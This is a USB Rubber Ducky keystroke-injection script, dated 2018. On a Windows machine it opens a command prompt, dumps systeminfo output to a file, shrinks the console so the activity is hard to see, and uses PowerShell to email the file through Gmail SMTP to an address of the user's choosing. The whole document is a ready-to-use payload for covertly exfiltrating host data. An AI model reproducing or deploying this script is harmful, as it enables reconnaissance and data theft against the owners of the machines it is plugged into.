REM
REM   --------------
REM   Discription: Send Mail with systeminfo
REM   Author:      Bastiaan Groen
REM   version:     1.1
REM   Date:        10-10-2018
REM   --------------
REM
REM   Change line 39, 43, 47 and 51 into your own data
REM   IPORTANT! Leave 1 SPACE infront of the data
REM
DELAY 800
GUI r
DELAY 600
STRING cmd
ENTER
DELAY 500
STRING start cmd | systeminfo > systeminfo.txt && TIMEOUT /T 1 && exit
ENTER
DELAY 200
F11
DELAY 350
CTRL-SHIFT -
REPEAT 14
DELAY 75
ENTER
STRING color f9
ENTER
STRING echo off
ENTER
STRING powershell
ENTER
STRING CLS
ENTER
STRING $emailSmtpServer = " smtp.gmail.com";$emailSmtpServerPort = "587";
ENTER
STRING CLS;
ENTER
STRING $emailSmtpUser = " YourGmailMail@gmail.com";
ENTER
STRING CLS;
ENTER
STRING $emailSmtpPass = " YourEmailPassword";
ENTER 
STRING CLS;
ENTER
STRING $emailFrom = " YourGmailMail@gmail.com";
ENTER
STRING CLS;
ENTER
STRING $emailTo = " YourAlterEmail@example.com";
ENTER 
STRING CLS;
ENTER 
STRING $emailMessage = New-Object System.Net.Mail.MailMessage( $emailFrom , $emailTo );
STRING $emailMessage.Subject = " RUBBER_DUCKY";
STRING $emailMessage.Body = " Duck";
ENTER
STRING $attach = New-Object Net.Mail.Attachment(" systeminfo.txt")
ENTER 
STRING CLS;
ENTER 
STRING $emailMessage.Attachments.Add($attach);
STRING $SMTPClient = New-Object System.Net.Mail.SmtpClient( $emailSmtpServer , $emailSmtpServerPort );
ENTER 
STRING CLS;
ENTER 
STRING $SMTPClient.EnableSsl = $True;$SMTPClient.Credentials = New-Object System.Net.NetworkCredential( $emailSmtpUser , $emailSmtpPass );
STRING $SMTPClient.Send( $emailMessage );
ENTER
STRING CLS;
ENTER
DELAY 300
STRING exit
ENTER
DELAY 150
ENTER
STRING CLS
ENTER